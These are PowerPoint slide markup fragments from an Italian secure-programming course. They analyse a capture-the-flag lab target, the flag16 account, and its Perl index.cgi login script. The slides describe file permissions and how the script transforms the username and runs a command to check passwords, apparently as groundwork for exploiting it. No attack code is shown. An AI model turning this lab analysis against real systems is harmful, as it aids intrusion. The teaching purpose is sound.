                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C90B0973-7464-FCF2-45B0-CB079D3F2629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1380623" y="3783803"/>
            <a:ext cx="2505630" cy="479132"/>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100" dirty="0"/>
              <a:t>Programmazione Sicura 2022/2023</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" b="1" dirty="0">
                <a:sym typeface="Quicksand"/>
              </a:rPr>
              <a:t>Prof.ssa B. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" b="1" dirty="0"/>
              <a:t>Masucci</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1100" b="1" dirty="0">
              <a:sym typeface="Quicksand"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Google Shape;1258;p52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3D32CEB-4F54-5DA3-0562-0036C30E9BF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="452166" y="4508813"/>
            <a:ext cx="2778916" cy="479132"/>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2800"/>
              <a:buFont typeface="Quicksand"/>
              <a:buNone/>
              <a:defRPr sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" marR="0" lvl="1" indent="-330200" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Quicksand"/>
              <a:buNone/>
              <a:defRPr sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" marR="0" lvl="2" indent="-330200" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Quicksand"/>
              <a:buNone/>
              <a:defRPr sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828800" marR="0" lvl="3" indent="-330200" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Quicksand"/>
              <a:buNone/>
              <a:defRPr sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2286000" marR="0" lvl="4" indent="-330200" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Quicksand"/>
              <a:buNone/>
              <a:defRPr sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2743200" marR="0" lvl="5" indent="-330200" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Quicksand"/>
              <a:buNone/>
              <a:defRPr sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3200400" marR="0" lvl="6" indent="-330200" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Quicksand"/>
              <a:buNone/>
              <a:defRPr sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3657600" marR="0" lvl="7" indent="-330200" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Quicksand"/>
              <a:buNone/>
              <a:defRPr sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4114800" marR="0" lvl="8" indent="-330200" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Quicksand"/>
              <a:buNone/>
              <a:defRPr sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="it-IT" sz="900" i="1" dirty="0"/>
              <a:t>Team: Marrazzo Vincenzo &amp; Spagna Zito Marika</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Elemento grafico 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCD53A94-44D1-4796-DCFE-39DE226F81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32948" y="1110332"/>
            <a:ext cx="3558886" cy="3558886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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39" name="Google Shape;1439;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365850" y="447121"/>
            <a:ext cx="64122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ANALISI DIRECTORY ACCESSIBILI</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1442" name="Google Shape;1442;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1443" name="Google Shape;1443;p53"/>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3"/>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3"/>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441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C2AF53C-3059-A800-5338-8C37A4255F84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="1242308"/>
            <a:ext cx="7704000" cy="128540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0" indent="0">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>La directory /home/flag16 contiene file di configurazione di BASH e altri tre file molto interessanti:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F99AAA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>index.cgi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F99AAA"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F99AAA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>thttpd.conf</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F99AAA"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F99AAA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>userdb.tx</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F99AAA"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Google Shape;1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E349DE8-8E70-3142-DA38-4E4094D97B93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="622933" y="4362003"/>
            <a:ext cx="7795866" cy="20999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ivvic"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>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2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksa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2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksa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2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Il file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>index.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>: è leggibile ed eseguibile da tutti gli utenti e modificabile solo da root. Inoltre non è SETUID. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Immagine 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E2A55BF-5017-EFED-D17B-00692D3250E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect t="3166" b="19614"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1268984" y="2672467"/>
            <a:ext cx="6287377" cy="1544781"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="Connettore diritto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB9A6AD3-D5D9-C91C-347E-A66DA63E0A4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1747024" y="3739376"/>
            <a:ext cx="499574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881464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4" name="Rettangolo 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C94474C4-EB34-530B-834A-AA00555D11B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4405745" y="1119495"/>
            <a:ext cx="4738255" cy="402400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1439" name="Google Shape;1439;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365850" y="447121"/>
            <a:ext cx="64122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it-IT"/>
              <a:t>Lo script I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ndex.cgi</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1441" name="Google Shape;1441;p53"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4322985" y="1119494"/>
            <a:ext cx="4336105" cy="3667168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0"/>
              <a:t>L’interprete dello script è il file binario eseguibile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F99AAA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F99AAA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F99AAA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F99AAA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>perl</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1100" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F99AAA"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="152400" lvl="0" indent="0" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0"/>
              <a:t>Importa il modulo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F99AAA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CGI.pm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" lvl="0" indent="0" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0"/>
              <a:t>Stampa su STDOUT l’intestazione http “Content-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1"/>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0"/>
              <a:t>”, che definisce il tipo di documento servito (HTML).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0"/>
              <a:t>sub login {...} definisce la funzione login</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" lvl="0" indent="0" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0"/>
              <a:t>le variabili </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F99AAA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0"/>
              <a:t>e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F99AAA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0"/>
              <a:t>memorizzano i due parametri della funzione ($_[0], $_[1]).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" lvl="0" indent="0" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0"/>
              <a:t>Il valore della variabile username viene convertito in maiuscolo e vengono cancellati tutti i caratteri dopo uno spazio. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0"/>
              <a:t>L’array “output” riceve tutte le righe dell’output del comando successivo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" lvl="0" indent="0" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0"/>
              <a:t>Ciclo dove per ogni linea di output si preleva username e password ed viene effettuato il confronto tra le password.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1442" name="Google Shape;1442;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1443" name="Google Shape;1443;p53"/>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3"/>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3"/>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magine 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13BCF987-6819-6406-E8C6-CA565C7E5D3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
